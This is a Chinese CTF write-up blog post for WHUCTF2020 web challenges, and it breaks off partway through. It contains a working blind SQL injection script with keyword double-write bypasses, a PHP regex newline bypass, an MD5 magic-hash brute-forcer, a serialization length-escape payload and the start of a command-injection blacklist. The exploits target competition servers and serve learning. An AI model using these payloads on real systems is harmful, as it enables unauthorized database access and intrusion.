

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Ustin1an">
  <meta name="keywords" content="">
  
    <meta name="description" content="准备考研去了，很久没有写过博客，包括网鼎杯的 Writeup 也咕咕咕了，刚好最近有个武大的比赛，闲来就做了一下，太久没打，只会做 easy 题目了，有些题目还是蛮有意思的，只写了和  Web 相关的几题。 Easy_sqli打开就是登陆框，试了万能密码发现有 Login success!，但是界面还是主页，应该后面就没有什么逻辑了，还爆出了执行的 sql 语句，非常贴心： 1Your sql s">
<meta property="og:type" content="article">
<meta property="og:title" content="WHUCTF2020 Writeup">
<meta property="og:url" content="https://52hertz.tech/2020/05/26/whuctf2020_writeup/index.html">
<meta property="og:site_name" content="Ustin1an&#39;s Blog">
<meta property="og:description" content="准备考研去了，很久没有写过博客，包括网鼎杯的 Writeup 也咕咕咕了，刚好最近有个武大的比赛，闲来就做了一下，太久没打，只会做 easy 题目了，有些题目还是蛮有意思的，只写了和  Web 相关的几题。 Easy_sqli打开就是登陆框，试了万能密码发现有 Login success!，但是界面还是主页，应该后面就没有什么逻辑了，还爆出了执行的 sql 语句，非常贴心： 1Your sql s">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/05f7980b6ab6816045465c1067477498">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/4a5affb4024b2251fd9864cca871e39a">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/89625b98c3cbfa060fa3a34924ea999f">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/8b08a2fa415c0b1354f6aa29254e8bcd">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/ba566ba0b1f09819682dbc13787fb2dd">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/c05e934d07d4e9035852492fd7fd2528">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/68ef8008264fa16a6c82f7bb79c7dfa9">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/71c6d2fc7a2d3f1619716a99aed09458">
<meta property="og:image" content="https://img.tucang.cc/api/image/show/93c1bb0c9d0d0413d810b70f1e51d4dd">
<meta property="article:published_time" content="2020-05-26T13:24:13.000Z">
<meta property="article:modified_time" content="2023-07-03T03:01:02.789Z">
<meta property="article:author" content="Ustin1an">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="WriteUps">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://img.tucang.cc/api/image/show/05f7980b6ab6816045465c1067477498">
  
  
  
  <title>WHUCTF2020 Writeup - Ustin1an&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"52hertz.tech","root":"/","version":"1.9.5-a","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="WHUCTF2020 Writeup"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2020-05-26 21:24" pubdate>
          2020年5月26日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          12k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          104 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">WHUCTF2020 Writeup</h1>
            
            
              <div class="markdown-body">
                
                <p>准备考研去了，很久没有写过博客，包括网鼎杯的 <code>Writeup</code> 也咕咕咕了，刚好最近有个武大的比赛，闲来就做了一下，太久没打，只会做 <code>easy</code> 题目了，有些题目还是蛮有意思的，只写了和  <code>Web</code> 相关的几题。</p>
<h1 id="Easy-sqli"><a href="#Easy-sqli" class="headerlink" title="Easy_sqli"></a>Easy_sqli</h1><p>打开就是登陆框，试了万能密码发现有 <code>Login success!</code>，但是界面还是主页，应该后面就没有什么逻辑了，还爆出了执行的 <code>sql</code> 语句，非常贴心：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">Your <span class="hljs-keyword">sql</span> statement <span class="hljs-keyword">is</span>: <span class="hljs-keyword">SELECT</span> password <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">WHERE</span> username<span class="hljs-operator">=</span><span class="hljs-string">&#x27;admin&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span>#<span class="hljs-string">&#x27; AND password=&#x27;</span><span class="hljs-number">123</span><span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>

<p>经过测试，发现对一些关键词进行了过滤，关键词被替换成空，目前根据自己的解法发现了 <code>from</code>， <code>select</code>， <code>or</code>， <code>where</code>，采取双写绕过即可。然后发现只要 <code>sql</code> 语句是对了，那么就会有 <code>Login success!</code>，盲注解一波就出来了。</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># admin&#x27; and exists(seleselectct * frfromom users)#</span><br><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> *<br><br>alphabet = [<span class="hljs-string">&#x27;&#123;&#x27;</span>, <span class="hljs-string">&#x27;&#125;&#x27;</span>, <span class="hljs-string">&#x27;@&#x27;</span>, <span class="hljs-string">&#x27;_&#x27;</span>, <span class="hljs-string">&#x27;,&#x27;</span>, <span class="hljs-string">&#x27;a&#x27;</span>, <span class="hljs-string">&#x27;b&#x27;</span>, <span class="hljs-string">&#x27;c&#x27;</span>, <span class="hljs-string">&#x27;d&#x27;</span>, <span class="hljs-string">&#x27;e&#x27;</span>, <span class="hljs-string">&#x27;f&#x27;</span>, <span class="hljs-string">&#x27;j&#x27;</span>, <span class="hljs-string">&#x27;h&#x27;</span>, <span class="hljs-string">&#x27;i&#x27;</span>, <span class="hljs-string">&#x27;g&#x27;</span>, <span class="hljs-string">&#x27;k&#x27;</span>, <span class="hljs-string">&#x27;l&#x27;</span>, <span class="hljs-string">&#x27;m&#x27;</span>, <span class="hljs-string">&#x27;n&#x27;</span>, <span class="hljs-string">&#x27;o&#x27;</span>, <span class="hljs-string">&#x27;p&#x27;</span>, <span class="hljs-string">&#x27;q&#x27;</span>, <span class="hljs-string">&#x27;r&#x27;</span>, <span class="hljs-string">&#x27;s&#x27;</span>, <span class="hljs-string">&#x27;t&#x27;</span>, <span class="hljs-string">&#x27;u&#x27;</span>, <span class="hljs-string">&#x27;v&#x27;</span>, <span class="hljs-string">&#x27;w&#x27;</span>, <span class="hljs-string">&#x27;x&#x27;</span>, <span class="hljs-string">&#x27;y&#x27;</span>, <span class="hljs-string">&#x27;z&#x27;</span>, <span class="hljs-string">&#x27;A&#x27;</span>, <span class="hljs-string">&#x27;B&#x27;</span>, <span class="hljs-string">&#x27;C&#x27;</span>, <span class="hljs-string">&#x27;D&#x27;</span>, <span class="hljs-string">&#x27;E&#x27;</span>, <span class="hljs-string">&#x27;F&#x27;</span>, <span class="hljs-string">&#x27;G&#x27;</span>, <span class="hljs-string">&#x27;H&#x27;</span>, <span class="hljs-string">&#x27;I&#x27;</span>, <span class="hljs-string">&#x27;G&#x27;</span>, <span class="hljs-string">&#x27;K&#x27;</span>, <span class="hljs-string">&#x27;L&#x27;</span>, <span class="hljs-string">&#x27;M&#x27;</span>, <span class="hljs-string">&#x27;N&#x27;</span>, <span class="hljs-string">&#x27;O&#x27;</span>, <span class="hljs-string">&#x27;P&#x27;</span>, <span class="hljs-string">&#x27;Q&#x27;</span>, <span class="hljs-string">&#x27;R&#x27;</span>, <span class="hljs-string">&#x27;S&#x27;</span>, <span class="hljs-string">&#x27;T&#x27;</span>, <span class="hljs-string">&#x27;U&#x27;</span>, <span class="hljs-string">&#x27;V&#x27;</span>, <span class="hljs-string">&#x27;W&#x27;</span>, <span class="hljs-string">&#x27;X&#x27;</span>, <span class="hljs-string">&#x27;Y&#x27;</span>, <span class="hljs-string">&#x27;Z&#x27;</span>, <span class="hljs-string">&#x27;0&#x27;</span>, <span class="hljs-string">&#x27;1&#x27;</span>, <span class="hljs-string">&#x27;2&#x27;</span>,<span class="hljs-string">&#x27;3&#x27;</span>,<span class="hljs-string">&#x27;4&#x27;</span>,<span class="hljs-string">&#x27;5&#x27;</span>,<span class="hljs-string">&#x27;6&#x27;</span>,<span class="hljs-string">&#x27;7&#x27;</span>,<span class="hljs-string">&#x27;8&#x27;</span>,<span class="hljs-string">&#x27;9&#x27;</span>]<br>res = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-comment"># WHUCTF&#123;r3lly_re11y_n0t_d1ffIcult_yet??~&#125;</span><br><span class="hljs-comment"># from, select, or, where</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">100</span>):<br>    <span class="hljs-comment">#for char in alphabet:</span><br>	<span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">33</span>, <span class="hljs-number">127</span>):<br>		<span class="hljs-comment"># information_schema,easy_sql1,mysql,performance_schema</span><br>		<span class="hljs-comment"># payload = &quot;selselectect group_concat(schema_name) ffromrom infoorrmation_schema.schemata&quot;</span><br><br>		<span class="hljs-comment"># f1ag_y0u_wi1l_n3ver_kn0w,user</span><br>		<span class="hljs-comment"># payload = &quot;seleselectct group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()&quot; </span><br><br>		<span class="hljs-comment"># f111114g,id,username,password</span><br>		<span class="hljs-comment"># payload = &#x27;seleselectct group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database()&#x27;</span><br>		<br>		payload = <span class="hljs-string">&quot;seselectlect group_concat(f111114g) frfromom f1ag_y0u_wi1l_n3ver_kn0w&quot;</span><br>		data = &#123;<br>			<span class="hljs-string">&quot;pass&quot;</span>: <span class="hljs-string">&quot;123&quot;</span>,<br>			<span class="hljs-string">&quot;user&quot;</span>: <span class="hljs-string">&quot;admin&#x27; and (ascii(substr((&#123;&#125;),&#123;&#125;,1))=&#123;&#125;)#&quot;</span>.<span class="hljs-built_in">format</span>(payload, i, char)<br>		&#125;<br>		url = <span class="hljs-string">&#x27;http://218.197.154.9:10011/login.php&#x27;</span><br>		r = requests.post(url=url, data=data)<br>		<span class="hljs-keyword">if</span> <span class="hljs-string">&quot;success!&quot;</span> <span class="hljs-keyword">in</span> r.text:<br>			res += <span class="hljs-built_in">chr</span>(char)<br>			<span class="hljs-built_in">print</span>(res)<br>			<span class="hljs-keyword">break</span><br>		<span class="hljs-comment"># print(r.content)</span><br></code></pre></td></tr></table></figure>

<p>这里还有个小插曲，我字符集里面没有 <code>?</code> 和 <code>~</code>，搞得我很迷惑，问了一下出题人，地方是对的但是 <code>flag</code> 不正确，那就是字符的问题，后来直接用 <code>ascii</code> 表跑就出来了。</p>
<h1 id="Ezphp"><a href="#Ezphp" class="headerlink" title="Ezphp"></a>Ezphp</h1><p>php 的代码审计，源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(__file__);<br><span class="hljs-variable">$string_1</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;str1&#x27;</span>];<br><span class="hljs-variable">$string_2</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;str2&#x27;</span>];<br><br><span class="hljs-comment">//1st</span><br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;num&#x27;</span>] !== <span class="hljs-string">&#x27;23333&#x27;</span> &amp;&amp; <span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/^23333$/&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;num&#x27;</span>]))&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;1st ok&#x27;</span>.<span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;会代码审计嘛23333&#x27;</span>);<br>&#125;<br><br><span class="hljs-comment">//2nd</span><br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_numeric</span>(<span class="hljs-variable">$string_1</span>))&#123;<br>    <span class="hljs-variable">$md5_1</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$string_1</span>);<br>    <span class="hljs-variable">$md5_2</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$string_2</span>);<br><br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$md5_1</span> != <span class="hljs-variable">$md5_2</span>)&#123;<br>        <span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">strtr</span>(<span class="hljs-variable">$md5_1</span>, <span class="hljs-string">&#x27;pggnb&#x27;</span>, <span class="hljs-string">&#x27;12345&#x27;</span>);<br>        <span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">strtr</span>(<span class="hljs-variable">$md5_2</span>, <span class="hljs-string">&#x27;pggnb&#x27;</span>, <span class="hljs-string">&#x27;12345&#x27;</span>);<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable">$a</span> == <span class="hljs-variable">$b</span>)&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;2nd ok&#x27;</span>.<span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br>        &#125;<br>        <span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;can u give me the right str???&quot;</span>);<br>        &#125;<br>    &#125; <br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;no!!!!!!!!&quot;</span>);<br>    &#125;<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;is str1 numeric??????&#x27;</span>);<br>&#125;<br><br><span class="hljs-comment">//3nd</span><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">filter</span>(<span class="hljs-params"><span class="hljs-variable">$string</span></span>)</span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/x/&#x27;</span>, <span class="hljs-string">&#x27;yy&#x27;</span>, <span class="hljs-variable">$string</span>);<br>&#125;<br><br><span class="hljs-variable">$username</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;username&#x27;</span>];<br><br><span class="hljs-variable">$password</span> = <span class="hljs-string">&quot;aaaaa&quot;</span>;<br><span class="hljs-variable">$user</span> = <span class="hljs-keyword">array</span>(<span class="hljs-variable">$username</span>, <span class="hljs-variable">$password</span>);<br><br><span class="hljs-variable">$r</span> = <span class="hljs-title function_ invoke__">filter</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$user</span>));<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$r</span>)[<span class="hljs-number">1</span>] == <span class="hljs-string">&quot;123456&quot;</span>)&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;flag.php&#x27;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>看到前两关就看出来是南邮2019的原题了，这里有三个绕过：</p>
<ol>
<li>传入的 <code>num</code> 的值不可以等于 <code>23333 </code>，并且这个值要被正则表达式 <code>/^23333$/</code> 匹配到，换行符绕过正则匹配。</li>
<li>传入 <code>str1</code>和 <code>str2 </code>的 <code>md5 </code>值不可以一样,但是经过<code>strtr</code>函数替换后的<code>md5</code>值要一样</li>
<li>反序列化长度逃逸，把字符串的 <code>x</code> 都替换成 <code>yy</code></li>
</ol>
<p>第一关使用 <code>num=23333%0a</code> 即可绕过</p>
<p>第二关的 <code>str1</code> 要是数字，<code>str2</code> 随便用一个 md5 后是 0e 开头且为纯数字的即可。<code>str1</code> 需要 md5 后以 0e 开头，后面只包含 <code>pggnb</code> 中一个或多个的字母，其余是数字，这样一替换就都是 0e 造成 php 弱类型的绕过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">import</span> requests<br><br><span class="hljs-comment"># 11230178</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">md5</span>():<br>	<span class="hljs-keyword">global</span> dict_az<br>	dict_az = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span><br>	i = <span class="hljs-number">0</span><br>	<span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>		result = <span class="hljs-string">&#x27;&#x27;</span><br>		result += <span class="hljs-built_in">str</span>(i)<br>		i = i + <span class="hljs-number">1</span><br>		hashed_s = hashlib.md5(result.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)).hexdigest()<br>		r = re.<span class="hljs-keyword">match</span>(<span class="hljs-string">&#x27;^0e[0-9pggnb]&#123;30&#125;&#x27;</span>, hashed_s)<br>		<span class="hljs-keyword">if</span> r:<br>			<span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] found! md5( &#123;&#125; ) ---&gt; &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(result, hashed_s))<br>			exit(<span class="hljs-number">0</span>)<br><br>		<span class="hljs-keyword">if</span> i % <span class="hljs-number">1000000</span> == <span class="hljs-number">0</span>:<br>			<span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] current value: &#123;&#125;       &#123;&#125; iterations, continue...&quot;</span>.<span class="hljs-built_in">format</span>(result, <span class="hljs-built_in">str</span>(i)))<br></code></pre></td></tr></table></figure>

<p>跑出来 <code>11230178</code> 即可成立，md5 值为 <code>0e732639146814822596b49bb6939b97</code>，替换后就为纯数字了，第二关过。</p>
<p>第三关就是 php 反序列化长度变化尾部字符串逃逸，可以参考 0ctf2016 的 piapiapia，题目将传入的 <code>username</code> 和  变量<code>password</code>打包成一个数组然后序列化，如果反序列化出来数组第二个元素等于 123456，即可得到flag。因此我们需要构造 <code>a:2:&#123;i:0;s:5:&quot;admin&quot;;i:1;s:6:&quot;123456&quot;;&#125;&quot;;i:1;s:5:&quot;aaaaa&quot;;&#125;</code> 来将字符串闭合控制第二个元素为我们的 123456，但是长度会变，我们要添加的字符串为 <code>admin&quot;;i:1;s:6:&quot;123456&quot;;&#125;</code>，长度为20，因此我们构造20个x，<code>xxxxxxxxxxxxxxxxxxxx&quot;;i:1;s:6:&quot;123456&quot;;&#125;</code>，这样x就会被替换成yy，我们就多了20个位置，把我们的 payload 挤出去，就刚好可以闭合了。</p>
<p>完整 payload: </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python">url = <span class="hljs-string">&#x27;http://218.197.154.9:10015/?num=23333%0a&amp;str1=0e215962017&amp;str2=11230178&#x27;</span><br>un = <span class="hljs-string">&#x27;xxxxxxxxxxxxxxxxxxxx&quot;;i:1;s:6:&quot;123456&quot;;&#125;&#x27;</span><br>data = &#123;<br>	<span class="hljs-string">&quot;username&quot;</span>: un<br>&#125;<br><span class="hljs-comment"># whuctf&#123;f4f9b4cd-e80e-4570-9b82-013d257c0756&#125;</span><br></code></pre></td></tr></table></figure>

<h1 id="ezcmd"><a href="#ezcmd" class="headerlink" title="ezcmd"></a>ezcmd</h1><p>这道题也是一个原题，GXYCTF2019 的 Ping Ping Ping，源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ip&#x27;</span>]))&#123;<br>  <span class="hljs-variable">$ip</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ip&#x27;</span>];<br>  <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;1f&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;</span>, <span class="hljs-variable">$ip</span>, <span class="hljs-variable">$match</span>))&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;</span>, <span class="hljs-variable">$ip</span>, <span class="hljs-variable">$match</span>);<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;fxck your symbol!&quot;</span>);<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/ /&quot;</span>, <span class="hljs-variable">$ip</span>))&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;no space!&quot;</span>);<br>  &#125; <span class="hljs-keyword">else</span> <span 